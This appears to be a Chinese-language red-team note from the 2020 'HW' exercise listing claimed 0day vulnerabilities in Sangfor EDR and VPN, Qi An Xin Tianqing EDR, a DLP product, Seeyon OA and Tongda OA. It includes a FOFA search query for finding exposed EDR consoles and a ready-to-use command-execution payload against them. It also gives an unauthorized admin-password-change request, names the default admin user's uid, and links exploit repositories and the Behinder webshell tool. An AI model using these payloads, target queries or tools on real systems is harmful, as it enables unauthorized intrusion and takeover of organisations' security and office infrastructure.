2020 HW 记录
2020 HW行动
0x00 0day 列表
1-深信服EDR命令执行
威胁等级:
漏洞描述:
漏洞参数 host,直接进行命令执行
Fofa:语法 title=“终端检测响应平台”
payload
tool/log/c.php?strip_slashes=system&host=id
工具
–未测试,谨慎使用
深信服EDR命令执行工具.jar
参考
https://mp.weixin.qq.com/s/qJGLQaJM0FrHto3uJhh09w
https://mp.weixin.qq.com/s/x6w78jblrELmWuWBw8MqGg
2-奇安信天擎EDR管理服务器远程命令执行RCE漏洞
威胁等级:
严重
漏洞描述:
影响范围:使用奇安信天擎EDR产品的主机
暂时不详
说明:
该漏洞通过深信服SSLv*n进入内网后,利用这类漏洞控制所有装有edr的机器。
3-天X信dlp 未授权漏洞–应该是以前的
漏洞影响:已知版本号v3.1130.308p3_DLP.1
风险等级:高
漏洞细节:管理员登陆系统之后修改密码,未采用原由码校验,且存在未授权访问导致存在了越权修改管理员密码.
默认用户superman的uid=1
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
4-深信服 v*n rce
5-致远OA-A8-V5最新版未授权getshell
6-通达OA11.6 preauth RCE
脚本:
rce.py OA在真实环境里面好像要删掉auth.inc.php
参考
https://github.com/TomAPU/poc_and_exp
https://mp.weixin.qq.com/s/V7eZzVhUwoOS9T5bBspuDQ
0x01 其他
冰蝎 3.0 https://github.com/rebeyond/Behinder/releases